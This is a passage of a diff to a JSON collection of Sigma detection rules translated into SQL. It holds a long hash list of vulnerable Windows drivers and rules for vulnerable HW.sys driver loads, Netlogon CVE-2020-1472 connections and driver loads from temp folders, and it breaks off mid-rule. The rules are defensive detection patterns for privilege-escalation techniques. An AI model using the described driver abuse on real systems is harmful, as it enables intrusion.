'be54f7279e69fb7651f98e91d24069dbc7c4c67e65850e486622ccbdc44d9a57', '3d23bdbaf9905259d858df5bf991eb23d2dc9f4ecda7f9f77839691acef1b8c4', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'b48a309ee0960da3caaaaf1e794e8c409993aeb3a2b64809f36b97aac8a1e62a', '84bf1d0bcdf175cfe8aea2973e0373015793d43907410ae97e2071b2c4b8e2d4', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c9b49b52b493b53cd49c12c3fa9553e57c5394555b64e32d1208f5b96a5b8c6e', '79e2d37632c417138970b4feba91b7e10c2ea251c5efe3d1fc6fa0190f176b57', '3390919bb28d5c36cc348f9ef23be5fa49bfd81263eb7740826e4437cbe904cd', '58c071cfe72e9ee867bba85cbd0abe72eb223d27978d6f0650d0103553839b59', '607dc4c75ac7aef82ae0616a453866b3b358c6cf5c8f9d29e4d37f844306b97c', '358ac54be252673841a1d65bfc2fb6d549c1a4c877fa7f5e1bfa188f30375d69', 'd0bd1ae72aeb5f3eabf1531a635f990e5eaae7fdd560342f915f723766c80889', 'f85cca4badff17d1aa90752153ccec77a68ad282b69e3985fdc4743eaea85004', '6908ebf52eb19c6719a0b508d1e2128f198d10441551cbfb9f4031d382f5229f', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', 'de6bf572d39e2611773e7a01f0388f84fb25da6cba2f1f8b9b36ffba467de6fa', '950a4c0c772021cee26011a92194f0e58d61588f77f2873aa0599dff52a160c9', '36505921af5a09175395ebaea29c72b2a69a3a9204384a767a5be8a721f31b10', '6de84caa2ca18673e01b91af58220c60aecd5cccf269725ec3c7f226b2167492', 'ef86c4e5ee1dbc4f81cd864e8cd2f4a2a85ee4475b9a9ab698a4ae1cc71fbeb0', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '7cfa5e10dff8a99a5d544b011f676bc383991274c693e21e3af40cf6982adb8c', 'f596e64f4c5d7c37a00493728d8756b243cfdc11e3372d6d6dfeffc13c9ab960', '0aafa9f47acf69d46c9542985994ff5321f00842a28df2396d4a3076776a83cb', '131d5490ceb9a5b2324d8e927fea5becfc633015661de2f4c2f2375a3a3b64c6', '3124b0411b8077605db2a9b7909d8240e0d554496600e2706e531c93c931e1b5', '1b7fb154a7b7903a3c81f12f4b094f24a3c60a6a8cffca894c67c264ab7545fa', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497', '9c2f3e9811f7d0c7463eaa1ee6f39c23f902f3797b80891590b43bbe0fdf0e51', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c60fcff9c8e5243bbb22ec94618b9dcb02c59bb49b90c04d7d6ab3ebbd58dc3a', '4045ae77859b1dbf13972451972eaaf6f3c97bea423e9e78f1c2f14330cd47ca', 'a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '3f2fda9a7a9c57b7138687bbce49a2e156d6095dddabb3454ea09737e02c3fa5', 'f8965fdce668692c3785afa3559159f9a18287bc0d53abb21902895a8ecf221b', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', '5bc3994612624da168750455b363f2964e1861dba4f1c305df01b970ac02a7ae', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '0fd2df82341bf5ebb8a53682e60d08978100c01acb0bed7b6ce2876ada80f670', '8111085022bda87e5f6aa4c195e743cc6dd6a3a6d41add475d267dc6b105a69f', 'be03e9541f56ac6ed1e81407dcd7cc85c0ffc538c3c2c2c8a9c747edbcf13100', '47f08f7d30d824a8f4bb8a98916401a37c0fd8502db308aba91fe3112b892dcc', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '7f375639a0df7fe51e5518cf87c3f513c55bc117db47d28da8c615642eb18bfa', 'a56c2a2425eb3a4260cc7fc5c8d7bed7a3b4cd2af256185f24471c668853aee8', 'a3e507e713f11901017fc328186ae98e23de7cea5594687480229f77d45848d8', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '9529efb1837b1005e5e8f477773752078e0a46500c748bc30c9b5084d04082e6', '2bbe65cbec3bb069e92233924f7ee1f95ffa16173fceb932c34f68d862781250', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '39cfde7d401efce4f550e0a9461f5fc4d71fa07235e1336e4f0b4882bd76550e', '984a77e5424c6d099051441005f2938ae92b31b5ad8f6521c6b001932862add7', 'db2a9247177e8cdd50fe9433d066b86ffd2a84301aa6b2eb60f361cfff077004', '30706f110725199e338e9cc1c940d9a644d19a14f0eb8847712cba4cacda67ab', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', '9f4ce6ab5e8d44f355426d9a6ab79833709f39b300733b5b251a0766e895e0e5', 'd92eab70bcece4432258c9c9a914483a2267f6ab5ce2630048d3a99e8cb1b482', 'e4a7da2cf59a4a21fc42b611df1d59cae75051925a7ddf42bf216cc1a026eadb', '525d9b51a80ca0cd4c5889a96f857e73f3a80da1ffbae59851e0f51bdfb0b6cd', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '4cff6e53430b81ecc4fae453e59a0353bcfe73dd5780abfc35f299c16a97998e', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', 'f8236fc01d4efaa48f032e301be2ebba4036b2cd945982a29046eca03944d2ae', '575e58b62afab094c20c296604dc3b7dd2e1a50f5978d8ee24b7dca028e97316', '3d9e83b189fcf5c3541c62d1f54a0da0a4e5b62c3243d2989afc46644056c8e3', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', 'c0d88db11d0f529754d290ed5f4c34b4dba8c4f2e5c4148866daabeab0d25f9c', '7e0124fcc7c95fdc34408cf154cb41e654dade8b898c71ad587b2090b1da30d7', '61a1bdddd3c512e681818debb5bee94db701768fc25e674fcad46592a3259bd0', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '45abdbcd4c0916b7d9faaf1cd08543a3a5178871074628e0126a6eda890d26e0', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', '1e8b0c1966e566a523d652e00f7727d8b0663f1dfdce3b9a09b9adfaef48d8ee', 'e7af7bcb86bd6bab1835f610671c3921441965a839673ac34444cf0ce7b2164e', '93d873cdf23d5edc622b74f9544cac7fe247d7a68e1e2a7bf2879fad97a3ae63', 'a9706e320179993dade519a83061477ace195daa1b788662825484813001f526', '61d6e40601fa368800980801a662a5b3b36e3c23296e8ae1c85726a56ef18cc8', '47eaebc920ccf99e09fc9924feb6b19b8a28589f52783327067c9b09754b5e84', 'fd8669794c67b396c12fc5f08e9c004fdf851a82faf302846878173e4fbecb03', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', '07b6d69bafcfd767f1b63a490a8843c3bb1f8e1bbea56176109b5743c8f7d357', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', '99f4994a0e5bd1bf6e3f637d3225c69ff4cd620557e23637533e7f18d7d6cba1', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', 'ece0a900ea089e730741499614c0917432246ceb5e11599ee3a1bb679e24fd2c', '8ef0ad86500094e8fa3d9e7d53163aa6feef67c09575c169873c494ed66f057f', '36b9e31240ab0341873c7092b63e2e0f2cab2962ebf9b25271c3a1216b7669eb', '6b830ea0db6546a044c9900d3f335e7820c2a80e147b0751641899d1a5aa8f74', '9c10e2ec4f9ef591415f9a784b93dc9c9cdafa7c69602c0dc860c5b62222e449', '5b9623da9ba8e5c80c49473f40ffe7ad315dcadffc3230afdc9d9226d60a715a', 'fafa1bb36f0ac34b762a10e9f327dcab2152a6d0b16a19697362d49a31e7f566', 'e61a54f6d3869b43c4eceac3016df73df67cce03878c5a6167166601c5d3f028', 'f88ebb633406a086d9cca6bc8b66a4ea940c5476529f9033a9e0463512a23a57', '2aa1b08f47fbb1e2bd2e4a492f5d616968e703e1359a921f62b38b8e4662f0c4', '06508aacb4ed0a1398a2b0da5fa2dbf7da435b56da76fd83c759a50a51c75caf', 'cc383ad11e9d06047a1558ed343f389492da3ac2b84b71462aee502a2fa616c8', '845f1e228de249fc1ddf8dc28c39d03e8ad328a6277b6502d3932e83b879a65a', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', '64f9e664bc6d4b8f5f68616dd50ae819c3e60452efd5e589d6604b9356841b57', '2a652de6b680d5ad92376ad323021850dab2c653abf06edf26120f7714b8e08a', '85866e8c25d82c1ec91d7a8076c7d073cccf421cf57d9c83d80d63943a4edd94', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', 'bb50818a07b0eb1bd317467139b7eb4bad6cd89053fecdabfeae111689825955', '9bb09752cf3a464455422909edef518ac18fe63cf5e1e8d9d6c2e68db62e0c87', 'b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '1c8dfa14888bb58848b4792fb1d8a921976a9463be8334cff45cc96f1276049a', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', '5c1585b1a1c956c7755429544f3596515dfdf928373620c51b0606a520c6245a', 'f40435488389b4fb3b945ca21a8325a51e1b5f80f045ab019748d0ec66056a8b', '405472a8f9400a54bb29d03b436ccd58cfd6442fe686f6d2ed4f63f002854659', '3a95cc82173032b82a0ffc7d2e438df64c13bc16b4574214c9fe3be37250925e', '42579a759f3f95f20a2c51d5ac2047a2662a2675b3fb9f46c1ed7f23393a0f00', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '159e7c5a12157af92e0d14a0d3ea116f91c09e21a9831486e6dc592c93c10980', '5c04c274a708c9a7d993e33be3ea9e6119dc29527a767410dbaf93996f87369a', 'fcdfe570e6dc6e768ef75138033d9961f78045adca53beb6fdb520f6417e0df1', 'cb57f3a7fe9e1f8e63332c563b0a319b26c944be839eabc03e9a3277756ba612', '4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6', '80cbba9f404df3e642f22c476664d63d7c229d45d34f5cd0e19c65eb41becec3', '29e0062a017a93b2f2f5207a608a96df4d554c5de976bd0276c2590a03bd3e94', 'db90e554ad249c2bd888282ecf7d8da4d1538dd364129a3327b54f8242dd5653', '8dafe5f3d0527b66f6857559e3c81872699003e0f2ffda9202a1b5e29db2002e', '101402d4f5d1ae413ded499c78a5fcbbc7e3bae9b000d64c1dd64e3c48c37558', '6ed35f310c96920a271c59a097b382da07856e40179c2a4239f8daa04eef38e7', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '37dde6bd8a7a36111c3ac57e0ac20bbb93ce3374d0852bcacc9a2c8c8c30079e', '5d530e111400785d183057113d70623e17af32931668ab7c7fc826f0fd4f91a3', 'd7bc7306cb489fe4c285bbeddc6d1a09e814ef55cf30bd5b8daf87a52396f102', '7049f3c939efe76a5556c2a2c04386db51daf61d56b679f4868bb0983c996ebb', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '3243aab18e273a9b9c4280a57aecef278e10bfff19abb260d7a7820e41739099', '0040153302b88bee27eb4f1eca6855039e1a057370f5e8c615724fa5215bada3', 'f0605dda1def240dc7e14efa73927d6c6d89988c01ea8647b671667b2b167008', 'b1334a71cc73b3d0c54f62d8011bec330dfc355a239bf94a121f6e4c86a30a2e', '74a846c61adc53692d3040aff4c1916f32987ad72b07fe226e9e7dbeff1036c4', '7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6', 'c1c4310e5d467d24e864177bdbfc57cb5d29aac697481bfa9c11ddbeebfd4cc8', '22418016e980e0a4a2d01ca210a17059916a4208352c1018b0079ccb19aaf86a', '76b86543ce05540048f954fed37bdda66360c4a3ddb8328213d5aef7a960c184', 'dd4a1253d47de14ef83f1bc8b40816a86ccf90d1e624c5adf9203ae9d51d4097', '025e7be9fcefd6a83f4471bba0c11f1c11bd5047047d26626da24ee9a419cdc4', '50d5eaa168c077ce5b7f15b3f2c43bd2b86b07b1e926c1b332f8cb13bd2e0793', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '749b0e8c8c8b7dda8c2063c708047cfe95afa0a4d86886b31a12f3018396e67c', 'd8459f7d707c635e2c04d6d6d47b63f73ba3f6629702c7a6e0df0462f6478ae2', '49f75746eebe14e5db11706b3e58accc62d4034d2f1c05c681ecef5d1ad933ba', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', 'ae79e760c739d6214c1e314728a78a6cb6060cce206fde2440a69735d639a0a2', '4422851a0a102f654e95d3b79c357ae3af1b096d7d1576663c027cfbc04abaf9', '84df20b1d9d87e305c92e5ffae21b10b325609d59d835a954dbd8750ef5dabf4', '7a7e8df7173387aec593e4fe2b45520ea3156c5f810d2bb1b2784efd1c922376', 'cd4a249c3ef65af285d0f8f30a8a96e83688486aab515836318a2559757a89bb', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '47f0cdaa2359a63ad1389ef4a635f1f6eee1f63bdf6ef177f114bdcdadc2e005', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1', '8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce', '36875562e747136313ec5db58174e5fab870997a054ca8d3987d181599c7db6a', '7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca', '591bd5e92dfa0117b3daa29750e73e2db25baa717c31217539d30ffb1f7f3a52', '04a85e359525d662338cae86c1e59b1d7aa9bd12b920e8067503723dc1e03162', '4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', 'e81230217988f3e7ec6f89a06d231ec66039bdba340fd8ebb2bbb586506e3293', '49c827cf48efb122a9d6fd87b426482b7496ccd4a2dbca31ebbf6b2b80c98530', 'd8b58f6a89a7618558e37afc360cd772b6731e3ba367f8d58734ecee2244a530', '7ec93f34eb323823eb199fbf8d06219086d517d0e8f4b9e348d7afd41ec9fd5d', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '89b0017bc30cc026e32b758c66a1af88bd54c6a78e11ec2908ff854e00ac46be', 'e005e8d183e853a27ad3bb56f25489f369c11b0d47e3d4095aad9291b3343bf1', '5f5e5f1c93d961985624768b7c676d488c7c7c1d4c043f6fc1ea1904fefb75be', 'cdd2a4575a46bada4837a6153a79c14d60ee3129830717ef09e0e3efd9d00812', 'ac3f613d457fc4d44fa27b2e0b1baa62c09415705efb5a40a4756da39b3ac165', '475e5016c9c0f5a127896f9179a1b1577a67b357f399ab5a1e68aab07134729a', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '0de4247e72d378713bcf22d5c5d3874d079203bb4364e25f67a90d5570bdcce8', '72b99147839bcfb062d29014ec09fe20a8f261748b5925b00171ef3cb849a4c1', 'cc586254e9e89e88334adee44e332166119307e79c2f18f6c2ab90ce8ba7fc9b', 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe', '5ee292b605cd3751a24e5949aae615d472a3c72688632c3040dc311055b75a92', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', 'f8886a9c759e0426e08d55e410b02c5b05af3c287b15970175e4874316ffaf13', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', '2da330a2088409efc351118445a824f11edbe51cf3d653b298053785097fe40e', '54841d9f89e195196e65aa881834804fe3678f1cf6b328cab8703edd15e3ec57', 'e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217', 'cf4b5fa853ce809f1924df3a3ae3c4e191878c4ea5248d8785dc7e51807a512b', '6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1', '708016fbe22c813a251098f8f992b177b476bd1bbc48c2ed4a122ff74910a965', '362c4f3dadc9c393682664a139d65d80e32caa2a97b6e0361dfd713a73267ecc', '08eb2d2aa25c5f0af4e72a7e0126735536f6c2c05e9c7437282171afe5e322c6', '2d83ccb1ad9839c9f5b3f10b1f856177df1594c66cbbc7661677d4b462ebf44d', 'c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c', '4941c4298f4560fc1e59d0f16f84bab5c060793700b82be2fd7c63735f1657a8', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', '76fb4deaee57ef30e56c382c92abffe2cf616d08dbecb3368c8ee6b02e59f303', '3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25', '7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d', 'f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', 'b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3', 'fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8', 'd5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', '6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2', 'dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc', '6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421', 'e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa', '0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff', '3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c', '7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f', '9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395', 'aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79', '146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88', '9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b', 'cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', '436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7', 'b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf', 'b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469', '4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7', 'af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685', 'b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d', 'ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41', '06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', '4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', '56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', '455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', '3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', '509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b'))" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "status": "experimental", + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" ], - "filename": "win_system_vul_cve_2020_1472.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - 